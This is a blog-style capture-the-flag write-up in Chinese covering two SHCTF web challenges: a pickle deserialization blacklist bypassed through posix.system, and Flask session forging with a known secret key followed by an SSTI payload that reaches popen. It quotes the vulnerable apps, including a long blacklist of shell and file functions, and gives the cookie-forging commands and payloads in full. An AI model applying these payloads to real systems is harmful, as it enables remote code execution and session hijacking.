SHCTF week2-web

shctf [Week2]dickle

从零开始python反序列化攻击:pickle原理解析 & 不用reduce的RCE姿势 - 知乎 (zhihu.com)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
from flask import Flask, request
import pickle
import base64
import io

BLACKLISTED_CLASSES = [
    'subprocess.check_output','builtins.eval','builtins.exec',
    'os.system', 'os.popen', 'os.popen2', 'os.popen3', 'os.popen4', 
    'pickle.load', 'pickle.loads', 'cPickle.load', 'cPickle.loads', 
    'subprocess.call', 'subprocess.check_call', 'subprocess.Popen', 
    'commands.getstatusoutput', 'commands.getoutput', 'commands.getstatus', 
    'pty.spawn', 'posixfile.open', 'posixfile.fileopen',
    '__import__','os.spawn*','sh.Command','imp.load_module','builtins.compile'
    'eval', 'builtins.execfile', 'compile', 'builtins.open', 'builtins.file', 'os.system', 
    'os.fdopen', 'os.tmpfile', 'os.fchmod', 'os.fchown', 'os.open', 'os.openpty', 'os.read', 'os.pipe',
    'os.chdir', 'os.fchdir', 'os.chroot', 'os.chmod', 'os.chown', 'os.link', 'os.lchown', 'os.listdir',
    'os.lstat', 'os.mkfifo', 'os.mknod', 'os.access', 'os.mkdir', 'os.makedirs', 'os.readlink', 'os.remove',
    'os.removedirs', 'os.rename', 'os.renames', 'os.rmdir', 'os.tempnam', 'os.tmpnam', 'os.unlink', 'os.walk',
    'os.execl', 'os.execle', 'os.execlp', 'os.execv', 'os.execve', 'os.dup', 'os.dup2', 'os.execvp', 'os.execvpe',
    'os.fork', 'os.forkpty', 'os.kill', 'os.spawnl', 'os.spawnle', 'os.spawnlp', 'os.spawnlpe', 'os.spawnv',
    'os.spawnve', 'os.spawnvp', 'os.spawnvpe', 'pickle.load', 'pickle.loads', 'cPickle.load', 'cPickle.loads',
    'subprocess.call', 'subprocess.check_call', 'subprocess.check_output', 'subprocess.Popen',
    'commands.getstatusoutput', 'commands.getoutput', 'commands.getstatus', 'glob.glob',
    'linecache.getline', 'shutil.copyfileobj', 'shutil.copyfile', 'shutil.copy', 'shutil.copy2', 'shutil.move',
    'shutil.make_archive', 'popen2.popen2', 'popen2.popen3', 'popen2.popen4', 'timeit.timeit', 'sys.call_tracing',
    'code.interact', 'code.compile_command', 'codeop.compile_command', 'pty.spawn', 'posixfile.open',
    'posixfile.fileopen'
]

class SafeUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        if f"{module}.{name}" in BLACKLISTED_CLASSES:
            raise pickle.UnpicklingError("Forbidden class: %s.%s" % (module, name))
        return super().find_class(module, name)

app = Flask(__name__)

@app.route("/", methods=["GET", "POST"])
def index():
    if request.method == "POST":
        encoded_data = request.form["data"]
        decoded_data = base64.b64decode(encoded_data)
        
        try:
            data_stream = io.BytesIO(decoded_data)
            unpickler = SafeUnpickler(data_stream)
            result = unpickler.load()
            return f"Deserialized data: {list(result)}"
        except Exception as e:
            return f"Error during deserialization: {str(e)}"
    else:
        return """
        <form method="post">
            <label for="data">Enter your serialized data:</label><br>
            <textarea id="data" name="data"></textarea><br>
            <input type="submit" value="Submit">
        </form>
        """

if __name__ == "__main__":
    app.run(port=8080)

waf看着很长,其实是幌子,实际上治标不治本

没有过滤__reduce__,这个方法在序列化时会被调用

分析过滤类

1
2
3
4
5
class SafeUnpickler(pickle.Unpickler): #表示SafeUnpickler继承pickle.Unpickler
    def find_class(self, module, name): #重写 find_class 方法 用做过滤
        if f"{module}.{name}" in BLACKLISTED_CLASSES: 
            raise pickle.UnpicklingError("Forbidden class: %s.%s" % (module, name))
        return super().find_class(module, name)  #调用父类方法 也就是正常pickle反序列化

在反序列化过程中,如果 pickle 模块遇到一个表示类的标记,它会调用 find_class 方法来查找和创建相应的类实例。

find_class 方法将识别到的 modulename 取决于 __reduce__ 方法返回的内容。

module是类的模块名,例如 “os“。name是类名,例如 “system

如果反序列化后执行的是os.system则会被禁止,抛出异常

如果你想直接return (eval, ("__import__('os').popen('tac /flag').read()",))是行不通的

本地调试

在过滤类打印find_class

find_class 解析的是 posix.system 而不是 os.system

在反序列化过程中, pickle 使用 find_class 方法来定位和导入必要的类或函数。由于 pickle 记录的是 posix.system,因此 find_class 会从 posix 模块中导入 system 函数,而不是从 os 模块中导入。

所以可以用os.system

当然os.system 执行结果只会显示在服务端,客户端返回的是退出状态码也就是执行成功为0,不会返回执行结果

所以要反弹shell

[Week2]入侵者禁入

session伪造、ssti

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
from flask import Flask, session, request, render_template_string 
app = Flask(__name__) 
app.secret_key = '0day_joker' 
@app.route('/') 
def index(): 
    session['role'] = { 'is_admin': 0, 'flag': 'your_flag_here' } 
    with open(__file__, 'r') as file: 
        code = file.read() 
        return code 
@app.route('/admin') 
def admin_handler(): 
        try: 
            role = session.get('role') 
            print(role)
            if not isinstance(role, dict): 
                raise Exception 
        except Exception: 
            return 'Without you, you are an intruder!' 
        if role.get('is_admin') == 1: 
            flag = role.get('flag') or 'admin' 
            message = "Oh,I believe in you! The flag is: %s" % flag 
            return render_template_string(message) 
        else: 
            return "Error: You don't have the power!" 
if __name__ == '__main__': 
    app.run('0.0.0.0', port=8080)

[https://github.com/noraj/flask-session-cookie-manager](https://github.com/noraj/flask-session-cookie-manager)

知道secret_key直接构造session,先解session

python3 flask_session_cookie_manager3.py decode -s '0day_joker' -c 'eyJyb2xlIjp7ImZsYWciOiJ5b3VyX2ZsYWdfaGVyZSIsImlzX2FkbWluIjowfX0.Zw6NhA.pRHC2qR5Y51O6ozJrrmIlpJaFrc'

构造session

python3 flask_session_cookie_manager3.py encode -s '0day_joker' -t "{'role': {'flag': '{{[].__class__.__bases__[0].__subclasses__()}}', 'is_admin': 1}}"

.eJyrVirKz0lVsqpWSstJTFeyUqqujo7Vi49PzkksLo6PB7KSEotTgaxoA5BwcWkSWAYkoqFZW6uko5RZHJ-YkpuZp2RlWFsLAFUDG9c.Zw6U2Q.PrL0RzrhMuUdUo5n-YvDce8Q2H0

第138个>说明os.wrap在第137个(列表从0开始,ctrl+f从1开始所以要-1)

通过.__init__.__globals__.popen调用popen方法

因为用单引号会报错,不能通过popen('cat /f*')来执行系统命令

所以用传参来绕过

在 Flask 中,request.args 是一个包含所有查询字符串参数的列表

request.args.a表示a参数的值

python3 flask_session_cookie_manager3.py encode -s '0day_joker' -t "{'role': {'flag': '{{[].__class__.__bases__[0].__subclasses__()[137].__init__.__globals__.popen(request.args.a).read()}}', 'is_admin': 1}}"

.eJwdi0EKwyAQRe8yK4UiDV0UvIqUYWymIkw1dZKVePfG7B7vv9-hVWHwHT5CCTz0Hl4O8S2kinhSJOWTwn1qPeK1TGNsWB7PaXPJ-9UmqZFk_ra6cTGNfwfr7qgldWRdY1qNHQNukBVp_eYCfhnjD3qJL0U.Zw9wdQ.pgUNXO7rv0tczhfeUiBwXS32VS8

CTF > 比赛Write Up
#比赛Write Up
SHCTF week2-web
http://example.com/2025/02/20/shctf-Week2/
作者
J_0k3r
发布于
2025年2月20日
许可协议
BY J_0K3R